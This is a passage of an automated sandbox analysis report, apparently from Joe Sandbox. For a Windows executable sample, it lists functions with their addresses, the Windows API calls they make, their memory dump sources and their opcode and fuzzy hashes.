                                          • Part of subcall function 002E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002DBAE9,00000000,?,?,?,00010456), ref: 002E1BA0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D2F91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1206968400-2756464174
                                        • Opcode ID: 57c54e48ed3371ad7c42d9b648b2618b1608dea83d7862b01869aa756e4cece3
                                        • Instruction ID: eda8157b7fdb1d3416f6069f0dab32240fae52943d3e3866dfb9df9e841850e5
                                        • Opcode Fuzzy Hash: 57c54e48ed3371ad7c42d9b648b2618b1608dea83d7862b01869aa756e4cece3
                                        • Instruction Fuzzy Hash: EE621471520246CFDB19CF34C8956EA3BA1AF64300F18447FED9A8B382D7759D69CB60
                                        Function 002EF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002EF844
                                        • IsDebuggerPresent.KERNEL32 ref: 002EF910
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002EF930
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 002EF93A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 35b12b6907bb473a94e44190a0e89adb6a978b9b3e5dc2aa9c59d53d5ed57b34
                                        • Instruction ID: c8996447c5c9002de237d526386ec9a2ba68279c98cabb79369d3ceb8e71fc61
                                        • Opcode Fuzzy Hash: 35b12b6907bb473a94e44190a0e89adb6a978b9b3e5dc2aa9c59d53d5ed57b34
                                        • Instruction Fuzzy Hash: 69312975D552199BDB61EFA5D9897CCBBB8AF08304F5040AAE40CAB250EB719B848F44
                                        Function 002EE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,002EE5E8,0000001C,002EE7DD,00000000,?,?,?,?,?,?,?,002EE5E8,00000004,00331CEC,002EE86D), ref: 002EE6B4
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,002EE5E8,00000004,00331CEC,002EE86D), ref: 002EE6CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 8695cc0feb4fd576d5a756dfa9ad3213ab8429f2dadb4ec49a380ac67e63df24
                                        • Instruction ID: 51c815111dea7fe20485533e88c43a97e25b5d028af0dab8bb93e00443201fc3
                                        • Opcode Fuzzy Hash: 8695cc0feb4fd576d5a756dfa9ad3213ab8429f2dadb4ec49a380ac67e63df24
                                        • Instruction Fuzzy Hash: 7D012B326501496BDF14DE29DC09BDE7BAEEFC4324F0DC121ED19D7154D634D9158680
                                        Function 002F8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002F8FB5
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002F8FBF
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 002F8FCC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: debd1dd4d55c26789cfd8fe247b6fb9a38a9c6924b6a058f3fe3755c6a3bf372
                                        • Instruction ID: c5a38ed8323a4e299bf5284c9db78d3a4d30835c3a436c53b00c32d64551d83b
                                        • Opcode Fuzzy Hash: debd1dd4d55c26789cfd8fe247b6fb9a38a9c6924b6a058f3fe3755c6a3bf372
                                        • Instruction Fuzzy Hash: CC31E57595121DABCB61DF25DD89B9CBBB8BF08310F5042EAE81CA7250EB309F918F44
                                        Function 002FD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction ID: 2f5a820267974a704f8c24d38be7b7222e16c5d8b451c5a50a3a97ed9e615620
                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction Fuzzy Hash: 46023D71E102199BDF14DFA9C8806ADF7F6EF88354F258269D919EB384D730AE51CB80
                                        Function 002EAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002EAF35
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0030E72C,?,?), ref: 002EAF84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 64712935d4421c73937dd4a484c3f267f73bb20f9c8d4d23eb1301341e57515d
                                        • Instruction ID: 2a9d07b8b38673840af3112cf67d558972d4e12835454e872d0fef6923a13048
                                        • Opcode Fuzzy Hash: 64712935d4421c73937dd4a484c3f267f73bb20f9c8d4d23eb1301341e57515d
                                        • Instruction Fuzzy Hash: AA017C3A250358AED7229F75EC45F9BB7BCEF08B10F404426FA05A7190E370A925CBA5
                                        Function 002D6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(002D6DDF,00000000,00000400), ref: 002D6C74
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 002D6C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 520b739d263f153ee77dd9f60f3be9f2c823a011c798ff08b92bb7e007d99cd3
                                        • Instruction ID: e65f2fce7231a95cf8d3c5d9d086a6dd24bf954dc41703bdae176f9cb1527f98
                                        • Opcode Fuzzy Hash: 520b739d263f153ee77dd9f60f3be9f2c823a011c798ff08b92bb7e007d99cd3
                                        • Instruction Fuzzy Hash: F7D0C731359301BFFA110F614D0EF5A7B5DBF45B51F14C4067755D40E0C6759824A615
                                        Function 003019F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003019EF,?,?,00000008,?,?,0030168F,00000000), ref: 00301C21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: f953feeda5cdb1fd07085813b976123be00ec759cb7d8cdae6c638b939e90eec
                                        • Instruction ID: 2a9c2b784d4751b5d21e3badacb1465c6375ba479b958a328a9e160acc09a302
                                        • Opcode Fuzzy Hash: f953feeda5cdb1fd07085813b976123be00ec759cb7d8cdae6c638b939e90eec
                                        • Instruction Fuzzy Hash: 1BB14E31611609DFE716CF28C49AB657BE0FF45364F268658E89ACF2E1C335D991CB40
                                        Function 002EF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002EF66A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 9408c9ef14347b2a50017f7df1382e5668a039cc26e6cb614d2b168ae6c7d136
                                        • Instruction ID: 290ba3db58fe94f61d6d82ed451b2fbf2cc55bc6429cc00104dbdd4836eceb53
                                        • Opcode Fuzzy Hash: 9408c9ef14347b2a50017f7df1382e5668a039cc26e6cb614d2b168ae6c7d136
                                        • Instruction Fuzzy Hash: 6D51C2B1A116068FEB55CF55E9817AAFBF8FB48304F64883AC405EB250D3759D11CF50
                                        Function 002DB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: b9854d521e81735bf85c16b1edc26034f54b08db7ecbceb5592d1515810d5773
                                        • Instruction ID: cb74922fa62e1f500a1130c219f838fd4733501036ee5c31b7ed1fe83035ab7a
                                        • Opcode Fuzzy Hash: b9854d521e81735bf85c16b1edc26034f54b08db7ecbceb5592d1515810d5773
                                        • Instruction Fuzzy Hash: 9AF01DB4E10208CFDB1ACB18ECA16D973B9E74C315F11469AD61993390C3B0AE858E60
                                        Function 002D40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 11b9dd27768d205cd6b4a7485acb9c45cbdaac6285721a789325a4510805a8e4
                                        • Instruction ID: 4a09d0535a5ea46353266ecae1a9c8549ced4f74927e71f3712516828d0e777f
                                        • Opcode Fuzzy Hash: 11b9dd27768d205cd6b4a7485acb9c45cbdaac6285721a789325a4510805a8e4
                                        • Instruction Fuzzy Hash: 9FC14772A183458FC354CF29D89065AFBE1BFC8308F19892EE998D7311D734E949CB96
                                        Function 002EF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,002EF3A5), ref: 002EF9DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 83b8f5df013b8bb7019c35278fa1a43f91a7e26dda3846c171161b56aea35e78
                                        • Instruction ID: 47d7e726146e226a35d64eaeea913f37b330600c1aceaf2366dd20a792662567
                                        • Opcode Fuzzy Hash: 83b8f5df013b8bb7019c35278fa1a43f91a7e26dda3846c171161b56aea35e78
                                        • Instruction Fuzzy Hash:
                                        Function 002FC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 1861bbbab5bbb69e2d9e1a3537fad6d192278af58da3497bc9b865e39934f1e0
                                        • Instruction ID: 6d0d0c63897f498acfe24be0717816d2aa4b74a9b16d31e7beef5bceb8a62fde
                                        • Opcode Fuzzy Hash: 1861bbbab5bbb69e2d9e1a3537fad6d192278af58da3497bc9b865e39934f1e0
                                        • Instruction Fuzzy Hash: 97A00270603201DFD74ADF35AF9E74E3BEDAE5A7D1F09406BA50AC5170EB7485A0AB01
                                        Function 002E62CA Relevance: .8, Instructions: 829COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                        • Instruction ID: 53f572083bc4a964fc2c98597db2d0276cf034bbd8c29cd46ee56bfe3a46b1f6
                                        • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                        • Instruction Fuzzy Hash: 4F6228716647C58FCB25CF29C8946B9BBE1BFA5304F48896ED8DA8B342D730E954CB10
                                        Function 002E77EF Relevance: .8, Instructions: 817COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                        • Instruction ID: a93bd85c191dacfc69a91571ee2bfc01ec14ee4bff105694e87037ddc5aebe58
                                        • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                        • Instruction Fuzzy Hash: F262477165C3C58FCB14CF29C880AB9BBE1BF95304F58896EE89A8B346D730E955CB11
                                        Function 002DF461 Relevance: .7, Instructions: 694COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                        • Instruction ID: 70b40c01ad6299c694f7264340c9c9a6d2ba6ce3b2440c769b6c66172d2e10a3
                                        • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                        • Instruction Fuzzy Hash: 04523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                        Function 002E7153 Relevance: .5, Instructions: 536COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8e2b98ccd6f1d95cd1cc05ba8210a70c0e129105d1b900d22ae199bfb6717e0
                                        • Instruction ID: c7e7baed39475828621c429344aad867ade18debc9eb671fafd57ed7618f7dd6
                                        • Opcode Fuzzy Hash: f8e2b98ccd6f1d95cd1cc05ba8210a70c0e129105d1b900d22ae199bfb6717e0
                                        • Instruction Fuzzy Hash: 4B1204B16687468FC718CF29C890AB9B7E0FF94304F50492EE996C7780E374E9A4DB45
                                        Function 002DC426 Relevance: .5, Instructions: 454COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
